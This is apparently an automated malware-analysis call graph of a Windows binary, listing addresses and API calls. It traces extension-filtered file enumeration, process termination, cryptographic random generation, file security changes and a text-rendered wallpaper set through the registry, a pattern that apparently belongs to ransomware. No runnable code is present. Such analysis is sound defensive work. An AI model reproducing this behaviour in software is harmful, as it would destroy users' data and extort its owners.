4478->4479 5634 41a570 4479->5634 4481 41a880 4482 41a8b9 CoUninitialize 4481->4482 4483 416ef2 ExitProcess 4481->4483 4482->4483 4484 41a7af 4484->4481 4485 41a570 CoGetObject 4484->4485 4485->4481 4487 411ea0 GetSystemMetrics GetSystemMetrics 4486->4487 4488 4123c4 4486->4488 4487->4488 4489 411ebe 4487->4489 4488->4350 4489->4488 4490 411ec6 GdipCreateBitmapFromScan0 GdipGetImageGraphicsContext 4489->4490 4491 411f1d 4490->4491 5638 401210 GdipCreateFontFamilyFromName 4491->5638 4493 411f66 GdipCreateStringFormat GdipSetStringFormatAlign 4494 411ff0 4493->4494 4495 411ff6 GdipSetStringFormatLineAlign 4493->4495 4494->4495 4496 41200c 4494->4496 4497 412006 4495->4497 4498 412151 GdipDeleteStringFormat GdipDeleteFont GdipDeleteGraphics GdipDisposeImage 4496->4498 4497->4496 5649 401160 GdipCreateLineBrushFromRect 4497->5649 4498->4350 4500 412040 GdipFillRectangle 4501 412064 4500->4501 4502 41206a malloc 4500->4502 4501->4502 4503 412081 4501->4503 4502->4503 4504 41208e 4502->4504 4505 412148 GdipDeleteBrush 4503->4505 4506 4120ce wsprintfW 4504->4506 4505->4498 5650 401160 GdipCreateLineBrushFromRect 4506->5650 4508 412103 5651 4011b0 4508->5651 4511 41212c free 4512 412136 4511->4512 4513 412138 GdipDeleteBrush 4512->4513 4513->4505 4514 412182 4514->4514 5655 4123d0 GdipGetImageEncodersSize 4514->5655 4516 4121c9 4516->4512 4517 4121d2 GetTempPathW GetTempFileNameW 4516->4517 4518 41220e 4517->4518 4519 41222c wsprintfW GdipSaveImageToFile 4518->4519 4520 412264 4519->4520 4520->4512 4520->4520 4521 412312 RegOpenKeyA 4520->4521 4521->4512 4522 412337 4521->4522 4523 412347 RegSetValueExA 4522->4523 4523->4512 4524 41236e 4523->4524 4525 41237e RegSetValueExA 4524->4525 4525->4512 4526 41239c RegCloseKey SystemParametersInfoW 4525->4526 4526->4513 4528 411a90 4527->4528 4528->4528 4529 411a9a malloc 4528->4529 4533 411ab0 4529->4533 4530 411b6c SHGetFolderPathW 4531 411b94 4530->4531 4532 411b9b wsprintfW CreateFileW 4531->4532 4534 411bd8 WriteFile 4532->4534 4535 411c8f 4532->4535 4533->4530 4537 411c0c CloseHandle 4534->4537 4538 411bfe CloseHandle 4534->4538 4535->4352 5663 411ca0 4537->5663 4538->4352 4540 411c1d 4541 411c81 ShellExecuteW 4540->4541 4541->4535 4542->4355 4544 416d08 4543->4544 4545 416d0f wsprintfW MoveFileExW 4544->4545 5677 401ce0 4545->5677 4547 416dd5 ShellExecuteExW 4547->4357 4549 411a1c 4548->4549 4564 410594 4548->4564 4549->4374 4550 4112a1 lstrcmpiW 4551 411a02 FindNextFileW 4550->4551 4552 4112b9 lstrcmpiW 4550->4552 4554 411a15 FindClose 4551->4554 4551->4564 4552->4551 4553 4112d1 lstrcmpiW 4552->4553 4553->4551 4555 4112e9 lstrcmpiW 4553->4555 4554->4549 4555->4551 4559 411301 lstrcmpiW 4555->4559 4556 411980 PathAddBackslashW 4556->4564 4557 41154b PathFindExtensionW 4558 4118b8 lstrcmpiW 4557->4558 4557->4564 4560 4118d0 lstrcmpiW 4558->4560 4558->4564 4559->4551 4561 411319 lstrcmpiW 4559->4561 4562 4118e8 lstrcmpiW 4560->4562 4560->4564 4561->4551 4563 411331 lstrcmpiW 4561->4563 4562->4564 4565 411900 lstrcmpiW 4562->4565 4563->4551 4566 411346 lstrcmpiW 4563->4566 4564->4550 4564->4551 4564->4556 4564->4557 4564->4558 4567 411582 lstrcmpiW 4564->4567 4570 4119d8 SetFileAttributesW 4564->4570 4574 419500 79 API calls 4564->4574 4565->4564 4568 411918 lstrcmpiW 4565->4568 4566->4551 4569 41135e lstrcmpiW 4566->4569 4567->4564 4571 411591 lstrcmpiW 4567->4571 4568->4564 4572 411930 lstrcmpiW 4568->4572 4569->4551 4573 411376 lstrcmpiW 4569->4573 4570->4564 4571->4564 4575 4115a0 lstrcmpiW 4571->4575 4572->4564 4576 411948 lstrcmpiW 4572->4576 4573->4551 4577 41138e lstrcmpiW 4573->4577 4574->4564 4575->4564 4578 4115af lstrcmpiW 4575->4578 4576->4564 4577->4551 4579 4113a6 lstrcmpiW 4577->4579 4578->4564 4580 4115be lstrcmpiW 4578->4580 4579->4551 4581 4113be lstrcmpiW 4579->4581 4580->4564 4582 4115cd lstrcmpiW 4580->4582 4581->4551 4583 4113d6 lstrcmpiW 4581->4583 4582->4564 4584 4115df lstrcmpiW 4582->4584 4583->4551 4585 4113ee lstrcmpiW 4583->4585 4584->4564 4586 4115ee lstrcmpiW 4584->4586 4585->4551 4587 411406 lstrcmpiW 4585->4587 4586->4564 4589 4115fd lstrcmpiW 4586->4589 4587->4551 4588 41141e lstrcmpiW 4587->4588 4588->4551 4590 411436 lstrcmpiW 4588->4590 4589->4564 4591 41160c lstrcmpiW 4589->4591 4590->4551 4592 41144e lstrcmpiW 4590->4592 4591->4564 4593 41161e lstrcmpiW 4591->4593 4592->4551 4594 411466 lstrcmpiW 4592->4594 4593->4564 4595 411630 lstrcmpiW 4593->4595 4594->4551 4597 41147e lstrcmpiW 4594->4597 4595->4564 4596 411642 lstrcmpiW 4595->4596 4596->4564 4598 411654 lstrcmpiW 4596->4598 4597->4551 4599 411496 lstrcmpiW 4597->4599 4598->4564 4600 411666 lstrcmpiW 4598->4600 4599->4551 4601 4114ae lstrcmpiW 4599->4601 4600->4564 4602 411678 lstrcmpiW 4600->4602 4601->4551 4603 4114c6 lstrcmpiW 4601->4603 4602->4564 4604 41168a lstrcmpiW 4602->4604 4603->4551 4605 4114de lstrcmpiW 4603->4605 4604->4564 4606 41169c lstrcmpiW 4604->4606 4605->4551 4607 4114f6 wsprintfW 4605->4607 4606->4564 4608 4116ae lstrcmpiW 4606->4608 4609 410530 79 API calls 4607->4609 4608->4564 4610 4116c0 lstrcmpiW 4608->4610 4609->4564 4610->4564 4611 4116d2 lstrcmpiW 4610->4611 4611->4564 4612 4116e4 lstrcmpiW 4611->4612 4612->4564 4613 4116f6 lstrcmpiW 4612->4613 4613->4564 4614 411708 lstrcmpiW 4613->4614 4614->4564 4615 41171a lstrcmpiW 4614->4615 4615->4564 4616 41172c lstrcmpiW 4615->4616 4616->4564 4617 41173e lstrcmpiW 4616->4617 4617->4564 4618 411750 lstrcmpiW 4617->4618 4618->4564 4619 411762 lstrcmpiW 4618->4619 4619->4564 4620 411774 lstrcmpiW 4619->4620 4620->4564 4621 411786 lstrcmpiW 4620->4621 4621->4564 4622 411798 lstrcmpiW 4621->4622 4622->4564 4623 4117aa lstrcmpiW 4622->4623 4623->4564 4624 4117bc lstrcmpiW 4623->4624 4624->4564 4625 4117ce lstrcmpiW 4624->4625 4625->4564 4626 4117e0 lstrcmpiW 4625->4626 4626->4564 4627 4117f2 lstrcmpiW 4626->4627 4627->4564 4628 411804 lstrcmpiW 4627->4628 4628->4564 4629 411816 lstrcmpiW 4628->4629 4629->4564 4630 411828 lstrcmpiW 4629->4630 4630->4564 4631 41183a lstrcmpiW 4630->4631 4631->4564 4632 41184c lstrcmpiW 4631->4632 4632->4564 4633 41185e lstrcmpiW 4632->4633 4633->4564 4634 411870 lstrcmpiW 4633->4634 4634->4564 4635 411882 lstrcmpiW 4634->4635 4635->4564 4636 411894 lstrcmpiW 4635->4636 4636->4564 4637 4118a6 lstrcmpiW 4636->4637 4637->4558 4637->4564 4639 419950 4638->4639 4640 41995b lstrcmpiW 4639->4640 4651 419974 4639->4651 4640->4639 4640->4651 4641 419980 CreateFileW 4642 4199d9 GlobalAlloc wsprintfW NtSetInformationFile 4641->4642 4641->4651 4644 419ac4 NtClose 4642->4644 4645 419a68 GlobalAlloc 4642->4645 4643 419acb 4643->4374 4644->4643 4645->4644 4647 419a7b NtQueryInformationFile 4645->4647 4648 419ad4 4647->4648 4649 419ab6 GlobalFree GlobalFree 4647->4649 4648->4649 4650 419afd 4648->4650 4649->4644 4698 412920 LoadLibraryA 4650->4698 4651->4641 4651->4643 4664 417880 4651->4664 4687 4127a0 NtOpenProcessToken malloc 4651->4687 4654 419b38 4655 412920 6 API calls 4654->4655 4656 419b46 ReadFile 4655->4656 4657 419b91 4656->4657 4658 419b62 4656->4658 4707 417f20 4657->4707 4658->4657 4659 419b6f GlobalFree GlobalFree NtClose 4658->4659 4659->4374 4661 419b99 4662 419bc1 4661->4662 4663 419bb4 Sleep 4661->4663 4662->4374 4663->4662 4663->4663 4665 417898 GetModuleHandleA 4664->4665 4666 4178da 4664->4666 4665->4666 4667 417906 GetProcAddress 4666->4667 4668 417950 4667->4668 4668->4668 4669 417963 GetProcAddress 4668->4669 4670 417981 4669->4670 4673 417ee7 4669->4673 4671 4179a1 GetProcAddress GetProcAddress 4670->4671 4670->4673 4672 417aa2 4671->4672 4671->4673 4672->4673 4674 417aaa NtOpenFile 4672->4674 4673->4651 4674->4673 4675 417ad1 GetProcAddress 4674->4675 4677 417b1c 4675->4677 4685 417b43 4675->4685 4677->4651 4678 417ebb 4678->4651 4679 417be1 GetProcAddress 4679->4685 4680 417d20 malloc 4681 417d3a NtQuerySystemInformation 4680->4681 4680->4685 4682 417e75 free 4681->4682 4681->4685 4682->4685 4683 417d9e CharLowerBuffW 4683->4685 4684 40f630 14 API calls 4684->4685 4685->4678 4685->4679 4685->4680 4685->4682 4685->4683 4685->4684 4721 416710 4685->4721 4688 4127dc NtQueryInformationToken 4687->4688 4689 41283e 4687->4689 4688->4689 4690 4127f5 InitializeSecurityDescriptor 4688->4690 4691 412845 CloseHandle 4689->4691 4692 41284c 4689->4692 4690->4689 4693 412805 SetSecurityDescriptorOwner 4690->4693 4691->4692 4694 412850 free 4692->4694 4695 41285a 4692->4695 4693->4689 4696 412816 SetFileSecurityW 4693->4696 4694->4695 4695->4651 4696->4689 4697 412829 SetFileSecurityW 4696->4697 4697->4689 4699 412a2a GetProcAddress 4698->4699 4700 4129ea CryptAcquireContextW 4698->4700 4701 412a44 4699->4701 4702 412a5b CryptAcquireContextW 4699->4702 4703 412a22 4700->4703 4704 412a05 CryptGenRandom 4700->4704 4701->4654 4702->4704 4705 412a76 4702->4705 4703->4654 4704->4701 4706 412a18 CryptReleaseContext 4704->4706 4705->4654 4706->4703 4736 4124f0 4707->4736 4709 417f40 PathRemoveFileSpecW 4710 417f80 4709->4710 4710->4710 4711 417f8d wsprintfW CreateFileW 4710->4711 4712 418021 4711->4712 4713 417fea NtSetInformationFile 4711->4713 4712->4661 4714 418029 GlobalAlloc 4713->4714 4715 418009 NtClose MessageBoxA 4713->4715 4716 418096 NtClose 4714->4716 4717 41803c WriteFile 4714->4717 4715->4712 4716->4661 4718 418082 4717->4718 4719 4180a5 4717->4719 4718->4719 4720 41808f GlobalFree 4718->4720 4719->4661 4720->4716 4735 4124f0 4721->4735 4723 416734 CreateToolhelp32Snapshot 4724 4167b8 GetCurrentProcessId 4723->4724 4725 416758 Process32First 4723->4725 4727 4167c2 OpenProcess 4724->4727 4728 4167ed 4724->4728 4726 416768 4725->4726 4729 4167b5 CloseHandle 4726->4729 4731 416770 GetCurrentProcessId 4726->4731 4732 4167a3 Process32Next 4726->4732 4727->4728 4730 4167d6 TerminateProcess CloseHandle 4727->4730 4728->4685 4729->4724 4730->4685 4731->4732 4733 416780 OpenProcess 4731->4733 4732->4726 4733->4726 4734 416794 TerminateProcess CloseHandle 4733->4734 4734->4726 4735->4723 4736->4709 4738 401380 4737->4738 4738->4420 4738->4738 4739->4427 4744 418651 4740->4744 4741 418671 RegCreateKeyExA 4742 4186a1 RegQueryValueExA RegQueryValueExA 4741->4742 4743 418873 4741->4743 4742->4744 4747 40f630 14 API calls 4743->4747 4744->4741 4745 4187a9 4744->4745 4746 418763 Sleep 4744->4746 4751 418778 4744->4751 4806 418e60 4745->4806 4746->4744 4749 4188aa 4747->4749 4752 418e60 54 API calls 4749->4752 4750 4187b1 4753 418c78 4750->4753 4834 418c90 4750->4834 4757 40f630 14 API calls 4751->4757 4755 4188b5 4752->4755 4753->4437 4755->4753 4760 418c90 51 API calls 4755->4760 4756 4187cd 4756->4753 4758 4187d5 RegSetValueExA RegSetValueExA RegCloseKey 4756->4758 4759 418795 RegCloseKey 4757->4759 4761 4188d1 4758->4761 4759->4761 4760->4761 4761->4753 4777 40c0e0 4761->4777 4763 41891a 4763->4753 4764 40c0e0 5 API calls 4763->4764 4765 41893a 4764->4765 4765->4753 4789 40d720 4765->4789 4767 418963 4767->4753 4768 418a12 malloc 4767->4768 4769 418a3f 4768->4769 4770 418a57 CryptBinaryToStringA 4769->4770 4770->4753 4771 418a83 4770->4771 4771->4771 4772 418ac9 CharUpperA CryptBinaryToStringA 4771->4772 4772->4753 4773 418b20 4772->4773 4773->4773 4774 418b59 CharUpperA 4773->4774 4776 418b8f 4774->4776 4775 418c57 free 4775->4437 4776->4775 4778 40c116 4777->4778 4786 40c19e 4777->4786 4780 40c132 4778->4780 4783 40c127 free 4778->4783 4781 40c15a 4780->4781 4782 40c14e 4780->4782 4784 40c15e calloc 4781->4784 4781->4786 4782->4763 4783->4780 4784->4782 4787 40c16f 4784->4787 4785 40c1ac 4785->4763 4852 40bbf0 4786->4852 4787->4786 4788 40c193 free 4787->4788 4788->4786 4790 40d740 4789->4790 4791 40d72f 4789->4791 4793 40d739 4790->4793 4794 40d758 4790->4794 4858 409f60 4791->4858 4793->4790 4796 409f60 3 API calls 4793->4796 4802 40d7a0 4793->4802 4795 40d770 4794->4795 4799 40d751 4794->4799 4798 40d788 4795->4798 4800 40d769 4795->4800 4796->4799 4797 409f60 3 API calls 4797->4800 4798->4802 4803 40d781 4798->4803 4799->4794 4799->4797 4799->4802 4800->4795 4801 409f60 3 API calls 4800->4801 4800->4802 4801->4803 4802->4767 4803->4798 4803->4802 4804 409f60 3 API calls 4803->4804 4805 40d799 4804->4805 4805->4802 4807 418e7b 4806->4807 4808 412920 6 API calls 4807->4808 4809 418ee2 4808->4809 4829 418f8a 4809->4829 4872 40d440 4809->4872 4811 40add0 free 4813 41908f 4811->4813 4812 418f3c 4812->4829 4906 40d1d0 4812->4906 4814 40add0 free 4813->4814 4816 419098 4814->4816 4818 40add0 free 4816->4818 4819 4190a1 4818->4819 4821 40add0 free 4819->4821 4822 4190aa 4821->4822 4823 40add0 free 4822->4823 4824 4190b3 4823->4824 4825 40add0 free 4824->4825 4826 4190bc 4825->4826 4827 40add0 free 4826->4827 4828 4190c5 4827->4828 4830 40add0 free 4828->4830 4829->4811 4831 4190ce 4830->4831 4927 40d3a0 4831->4927 4833 4190da 4833->4750 4835 418cb3 4834->4835 4836 40c0e0 5 API calls 4835->4836 4837 418cdd 4836->4837 4838 418e07 4837->4838 4840 40c0e0 5 API calls 4837->4840 4839 40add0 free 4838->4839 4841 418e1c 4839->4841 4842 418cf8 4840->4842 4843 40add0 free 4841->4843 4842->4838 4844 40d720 3 API calls 4842->4844 4845 418e25 4843->4845 4847 418d1b 4844->4847 4846 40d3a0 free 4845->4846 4848 418e2f 4846->4848 4847->4838 4849 412920 6 API calls 4847->4849 4848->4756 4850 418d4f 4849->4850 4850->4838 5348 40d800 4850->5348 4853 40bc00 calloc 4852->4853 4854 40bc48 4852->4854 4855 40bc12 4853->4855 4856 40bc19 4853->4856 4854->4785 4855->4785 4856->4854 4857 40bc3d free 4856->4857 4857->4854 4859 409f7c 4858->4859 4860 409f6f 4858->4860 4859->4793 4861 409f85 4860->4861 4862 409f76 4860->4862 4864 409fbc calloc 4861->4864 4865 409fb2 4861->4865 4868 40add0 4862->4868 4864->4865 4866 409fd0 4864->4866 4865->4793 4866->4865 4867 409ff4 free 4866->4867 4867->4865 4869 40addb 4868->4869 4870 40adfa 4868->4870 4869->4870 4871 40adef free 4869->4871 4870->4859 4871->4870 4873 40d70a 4872->4873 4874 40d455 4872->4874 4873->4812 4874->4873 4875 40bbf0 2 API calls 4874->4875 4876 40d4a4 4875->4876 4905 40d642 4876->4905 4953 40b090 4876->4953 4878 40add0 free 4879 40d64f 4878->4879 4880 40add0 free 4879->4880 4881 40d658 4880->4881 4883 40add0 free 4881->4883 4882 40b090 37 API calls 4894 40d4cd 4882->4894 4884 40d661 4883->4884 4885 40d702 4884->4885 4887 40d3a0 free 4884->4887 4885->4812 4888 40d672 4887->4888 4888->4812 4889 40c510 8 API calls 4889->4894 4891 40ae20 10 API calls 4891->4894 4894->4882 4894->4889 4894->4891 4895 40d681 4894->4895 4894->4905 4973 40c550 4894->4973 4982 40bf10 4894->4982 4998 40a040 4894->4998 5052 40b500 4894->5052 5101 409c90 4895->5101 4898 409c90 8 API calls 4899 40d69c 4898->4899 4900 40bf10 9 API calls 4899->4900 4899->4905 4901 40d6b3 4900->4901 4901->4905 5104 40edc0 4901->5104 4905->4878 4908 40d1e4 4906->4908 4907 40d2b6 4907->4829 4918 40d2d0 4907->4918 4908->4907 4909 40d25c 4908->4909 4910 409f60 3 API calls 4908->4910 4909->4907 4911 40d274 4909->4911 4912 409f60 3 API calls 4909->4912 4910->4909 4911->4907 4913 40d289 4911->4913 4914 409f60 3 API calls 4911->4914 4912->4911 4913->4907 4915 409f60 3 API calls 4913->4915 4916 40d29e 4913->4916 4914->4913 4915->4916 4916->4907 4917 409f60 3 API calls 4916->4917 4917->4907 4920 40d2e2 4918->4920 4919 40d38e 4919->4829 4920->4919 4921 40d34a 4920->4921 4922 409f60 3 API calls 4920->4922 4923 40d362 4921->4923 4924 409f60 3 API calls 4921->4924 4925 40d37a 4921->4925 4922->4921 4923->4925 4926 409f60 3 API calls 4923->4926 4924->4923 4925->4829 4926->4925 4928 40d3af 4927->4928 4952 40d424 4927->4952 4929 40add0 free 4928->4929 4930 40d3bb 4929->4930 4931 40add0 free 4930->4931 4932 40d3c7 4931->4932 4933 40add0 free 4932->4933 4934 40d3d0 4933->4934 4935 40add0 free 4934->4935 4936 40d3d9 4935->4936 4937 40add0 free 4936->4937 4938 40d3e2 4937->4938 4939 40add0 free 4938->4939 4940 40d3eb 4939->4940 4941 40add0 free 4940->4941 4942 40d3f4 4941->4942 4943 40add0 free 4942->4943 4944 40d3fd 4943->4944 4945 40add0 free 4944->4945 4946 40d409 4945->4946 4947 40add0 free 4946->4947 4948 40d412 4947->4948 4949 40add0 free 4948->4949 4950 40d41b 4949->4950 4951 40add0 free 4950->4951 4951->4952 4952->4833 4954 40b430 4953->4954 4956 40b0a7 4953->4956 4954->4894 5124 40acd0 4956->5124 4957 40b1d8 4958 40acd0 5 API calls 4957->4958 4961 40b262 4957->4961 4962 40b269 4957->4962 5135 40c330 4957->5135 5140 40bab0 4957->5140 4958->4957 4961->4894 4963 40b30f 4962->4963 5145 409cd0 4962->5145 4963->4961 4965 409f60 3 API calls 4963->4965 4966 40b326 4965->4966 4967 40b40a 4966->4967 4968 40c330 2 API calls 4966->4968 4967->4961 4969 40b41e free 4967->4969 4970 40b33e 4968->4970 4969->4961 4970->4967 4971 40c7e0 36 API calls 4970->4971 4972 409cd0 8 API calls 4970->4972 4971->4970 4972->4970 4974 40c5a7 4973->4974 4975 40c569 4973->4975 4976 409ac0 7 API calls 4974->4976 4977 40c575 4975->4977 4978 40c58c 4975->4978 4981 40c580 4976->4981 4979 40c440 4 API calls 4977->4979 4980 40c440 4 API calls 4978->4980 4979->4981 4980->4981 4981->4894 4983 40bf56 4982->4983 4984 40bf4c 4982->4984 4986 409f60 3 API calls 4983->4986 4987 40c0b9 4983->4987 4989 40bf7d 4983->4989 4985 409f60 3 API calls 4984->4985 4985->4983 4986->4989 4988 40c0d6 4987->4988 4992 40c0cd free 4987->4992 4988->4894 4990 40bfe7 calloc 4989->4990 4993 40c035 4989->4993 4997 40bfd8 4989->4997 4995 40c003 4990->4995 4990->4997 4991 40bbf0 2 API calls 4991->4997 4992->4988 4993->4991 4994 40c0b0 free 4994->4987 4995->4993 4996 40c027 free 4995->4996 4996->4993 4997->4987 4997->4994 5000 40a06f 4998->5000 4999 40a076 4999->4894 5000->4999 5001 40a139 5000->5001 5002 40a0fa 5000->5002 5003 409f60 3 API calls 5001->5003 5004 40a108 5002->5004 5006 40bbf0 2 API calls 5002->5006 5005 40a143 5003->5005 5007 40a123 5004->5007 5009 409f60 3 API calls 5004->5009 5008 40a21b 5005->5008 5010 409f60 3 API calls 5005->5010 5006->5004 5007->4894 5011 40a23b 5008->5011 5015 40a232 free 5008->5015 5009->5007 5013 40a15c 5010->5013 5012 40a258 5011->5012 5016 40a24f free 5011->5016 5014 40a275 5012->5014 5019 40a26c free 5012->5019 5013->5008 5017 40b470 2 API calls 5013->5017 5018 40a292 5014->5018 5021 40a289 free 5014->5021 5015->5011 5016->5012 5020 40a187 5017->5020 5018->5007 5023 40a2a3 free 5018->5023 5019->5014 5020->5008 5022 40bbf0 2 API calls 5020->5022 5021->5018 5024 40a19e 5022->5024 5023->5007 5024->5008 5025 40b470 2 API calls 5024->5025 5026 40a1b2 5025->5026 5026->5008 5027 40b470 2 API calls 5026->5027 5028 40a1c6 5027->5028 5028->5008 5029 40a20e 5028->5029 5030 40c1f0 2 API calls 5028->5030 5029->5008 5031 40c1f0 2 API calls 5029->5031 5032 40a1fb 5030->5032 5038 40a2d9 5031->5038 5032->5008 5033 40c1f0 2 API calls 5032->5033 5033->5029 5034 40a335 5035 40c330 2 API calls 5034->5035 5046 40a33f __aulldiv 5035->5046 5036 40c550 8 API calls 5036->5038 5037 40a545 5039 40a55b 5037->5039 5040 409f60 3 API calls 5037->5040 5038->5008 5038->5034 5038->5036 5039->5008 5041 40c330 2 API calls 5039->5041 5040->5039 5042 40a58c 5041->5042 5042->5008 5044 409f60 3 API calls 5042->5044 5043 40bbf0 calloc free 5043->5046 5044->5008 5045 40bf10 9 API calls 5045->5046 5046->5008 5046->5037 5046->5043 5046->5045 5048 40c550 8 API calls 5046->5048 5049 409f60 3 API calls 5046->5049 5050 40c1f0 calloc free 5046->5050 5051 409cd0 8 API calls 5046->5051 5270 40bed0 5046->5270 5048->5046 5049->5046 5050->5046 5051->5046 5053 40b52f 5052->5053 5054 40b536 5053->5054 5273 40ae20 5053->5273 5054->4894 5056 40b649 5057 40ba2d 5056->5057 5061 40ba24 free 5056->5061 5059 40ba4a 5057->5059 5064 40ba41 free 5057->5064 5058 40b60d 5058->5056 5063 40bd30 23 API calls 5058->5063 5060 40ba67 5059->5060 5065 40ba5e free 5059->5065 5062 40ba84 5060->5062 5068 40ba7b free 5060->5068 5061->5057 5066 40baa1 5062->5066 5071 40ba98 free 5062->5071 5067 40b65e 5063->5067 5064->5059 5065->5060 5066->4894 5069 409f60 3 API calls 5067->5069 5073 40b997 5067->5073 5068->5062 5072 40b678 5069->5072 5070 40b9b9 5074 40b9d6 5070->5074 5078 40b9cd free 5070->5078 5071->5066 5072->5073 5077 409f60 3 API calls 5072->5077 5073->5070 5076 40b9b0 free 5073->5076 5075 40b9f3 5074->5075 5079 40b9ea free 5074->5079 5075->5056 5081 40ba07 free 5075->5081 5076->5070 5080 40b68f 5077->5080 5078->5074 5079->5075 5080->5073 5082 409f60 3 API calls 5080->5082 5081->5056 5083 40b6a6 5082->5083 5083->5073 5084 40bbf0 2 API calls 5083->5084 5085 40b6be 5084->5085 5085->5073 5086 40bbf0 2 API calls 5085->5086 5087 40b6d5 5086->5087 5087->5073 5088 40bbf0 2 API calls 5087->5088 5089 40b6ec 5088->5089 5089->5073 5090 40bbf0 2 API calls 5089->5090 5091 40b704 5090->5091 5091->5073 5092 409cd0 8 API calls 5091->5092 5093 40c330 calloc free 5091->5093 5094 40c550 8 API calls 5091->5094 5096 40b91a 5091->5096 5092->5091 5093->5091 5094->5091 5095 409cd0 8 API calls 5095->5096 5096->5073 5096->5095 5100 40b955 5096->5100 5097 40b98b 5099 409f60 3 API calls 5097->5099 5098 40c550 8 API calls 5098->5100 5099->5073 5100->5073 5100->5097 5100->5098 5102 409cd0 8 API calls 5101->5102 5103 409cc9 5102->5103 5103->4898 5103->4905 5105 40edd3 5104->5105 5106 40ee01 5105->5106 5293 40c510 5105->5293 5107 40ee35 5106->5107 5109 40c510 8 API calls 5106->5109 5110 40ee51 5106->5110 5107->5110 5113 40b500 34 API calls 5107->5113 5112 40ee1f 5109->5112 5114 40add0 free 5110->5114 5112->5110 5117 40bd30 23 API calls 5112->5117 5113->5110 5115 40d6e2 5114->5115 5115->4905 5118 40d0b0 5115->5118 5116 40bd30 23 API calls 5116->5106 5117->5107 5120 40d0bf 5118->5120 5119 40d110 5119->4905 5120->5119 5296 40f020 5120->5296 5125 40ad8e 5124->5125 5126 40ad06 5124->5126 5127 40bbf0 2 API calls 5125->5127 5128 40ad22 5126->5128 5130 40ad17 free 5126->5130 5133 40ad9c 5127->5133 5128->5125 5129 40ad3e 5128->5129 5131 40ad4e calloc 5128->5131 5129->4957 5130->5128 5131->5129 5132 40ad5f 5131->5132 5132->5125 5134 40ad83 free 5132->5134 5133->4957 5134->5125 5137 40c35a 5135->5137 5136 40bbf0 2 API calls 5138 40c40e 5136->5138 5137->5136 5139 40c364 5137->5139 5138->4957 5139->4957 5142 40baf4 5140->5142 5141 40bb6d 5141->4957 5142->5141 5154 40c7e0 5142->5154 5144 40bb8a 5144->4957 5146 409d27 5145->5146 5147 409ce9 5145->5147 5148 409ac0 7 API calls 5146->5148 5149 409cf5 5147->5149 5150 409d0c 5147->5150 5153 409d00 5148->5153 5151 40c440 4 API calls 5149->5151 5152 40c440 4 API calls 5150->5152 5151->5153 5152->5153 5153->4963 5155 40c876 5154->5155 5156 40c8c7 5154->5156 5158 40c8a5 5155->5158 5159 40c885 5155->5159 5192 409ac0 5156->5192 5161 40c440 4 API calls 5158->5161 5183 40c440 5159->5183 5160 40cbdf 5164 40cbfe 5160->5164 5168 40cbf3 free 5160->5168 5165 40c890 5161->5165 5163 40cbba 5163->5160 5166 40cbd4 free 5163->5166 5171 40cc12 free 5164->5171 5173 40cc1d 5164->5173 5165->5163 5167 409f60 3 API calls 5165->5167 5166->5160 5172 40c900 5167->5172 5168->5164 5169 40cc37 5170 40cc51 5169->5170 5176 40cc48 free 5169->5176 5170->5144 5171->5173 5172->5163 5174 40c330 2 API calls 5172->5174 5173->5169 5175 40cc2e free 5173->5175 5180 40c919 5174->5180 5175->5169 5176->5170 5177 40acd0 5 API calls 5177->5180 5178 40cc64 5178->5144 5180->5163 5180->5177 5180->5178 5181 40bf10 9 API calls 5180->5181 5203 40a5e0 5180->5203 5246 40bd30 5180->5246 5181->5180 5185 40c453 5183->5185 5184 40c45a 5184->5165 5185->5184 5186 40c48a 5185->5186 5187 409f60 3 API calls 5185->5187 5188 409f60 3 API calls 5186->5188 5189 40c4a8 5186->5189 5187->5186 5188->5189 5190 40c506 5189->5190 5191 40c4fd free 5189->5191 5190->5165 5191->5190 5193 409add 5192->5193 5195 409ae4 5192->5195 5194 409f60 3 API calls 5193->5194 5194->5195 5196 409b31 calloc 5195->5196 5197 409c75 5195->5197 5201 409b7b 5195->5201 5196->5197 5198 409b49 5196->5198 5197->5165 5199 409b6d free 5198->5199 5198->5201 5199->5201 5200 409bfd calloc 5200->5197 5200->5201 5201->5197 5201->5200 5202 409c32 free 5201->5202 5202->5201 5205 40a613 5203->5205 5204 40acbb 5204->5180 5205->5204 5257 40b470 5205->5257 5207 40a73c 5209 40b470 2 API calls 5207->5209 5213 40abb8 5207->5213 5208 40ac2b 5210 40ac4e 5208->5210 5215 40ac45 free 5208->5215 5211 40a758 5209->5211 5212 40ac6b 5210->5212 5217 40ac62 free 5210->5217 5211->5213 5214 40b470 2 API calls 5211->5214 5218 40ac7f free 5212->5218 5222 40ac88 5212->5222 5213->5208 5219 40ac00 free 5213->5219 5216 40a774 5214->5216 5215->5210 5216->5213 5221 40a798 5216->5221 5223 409f60 3 API calls 5216->5223 5217->5212 5218->5222 5219->5213 5220 40acb2 5220->5180 5221->5213 5225 40bbf0 2 API calls 5221->5225 5227 40a7bf 5221->5227 5222->5220 5224 40aca9 free 5222->5224 5223->5221 5224->5220 5226 40a7db 5225->5226 5226->5213 5264 40c1f0 5226->5264 5227->5213 5230 40a857 5227->5230 5231 40a84a 5227->5231 5233 409f60 3 API calls 5230->5233 5232 40bd30 23 API calls 5231->5232 5235 40a852 5232->5235 5233->5235 5234 40bd30 23 API calls 5234->5227 5235->5213 5236 409f60 3 API calls 5235->5236 5237 40a89a 5236->5237 5237->5213 5238 40b470 2 API calls 5237->5238 5243 40a9eb 5237->5243 5239 40a8fa 5238->5239 5239->5213 5240 409f60 3 API calls 5239->5240 5241 40a916 5240->5241 5241->5213 5242 40b470 2 API calls 5241->5242 5241->5243 5245 409f60 3 API calls 5241->5245 5242->5241 5243->5213 5244 409cd0 8 API calls 5243->5244 5244->5213 5245->5241 5247 40bd5f 5246->5247 5248 40bd66 5247->5248 5249 40a040 23 API calls 5247->5249 5248->5180 5253 40bd81 5249->5253 5250 40beb8 5250->5180 5251 409ac0 7 API calls 5251->5253 5252 409ac0 7 API calls 5255 40be4a 5252->5255 5253->5250 5253->5251 5254 40c440 calloc free free free 5253->5254 5253->5255 5254->5253 5255->5250 5255->5252 5256 40c440 calloc free free free 5255->5256 5256->5255 5258 40b481 5257->5258 5259 40b4d6 5257->5259 5260 40b489 calloc 5258->5260 5261 40b4c9 5258->5261 5259->5207 5260->5259 5262 40b49a 5260->5262 5261->5207 5262->5261 5263 40b4be free 5262->5263 5263->5261 5265 40c217 5264->5265 5266 40a7f8 5265->5266 5267 40c25b calloc 5265->5267 5266->5213 5266->5234 5267->5266 5268 40c26c 5267->5268 5268->5266 5269 40c290 free 5268->5269 5269->5266 5271 40bf10 9 API calls 5270->5271 5272 40beff 5271->5272 5272->5046 5274 409f60 3 API calls 5273->5274 5275 40ae5d 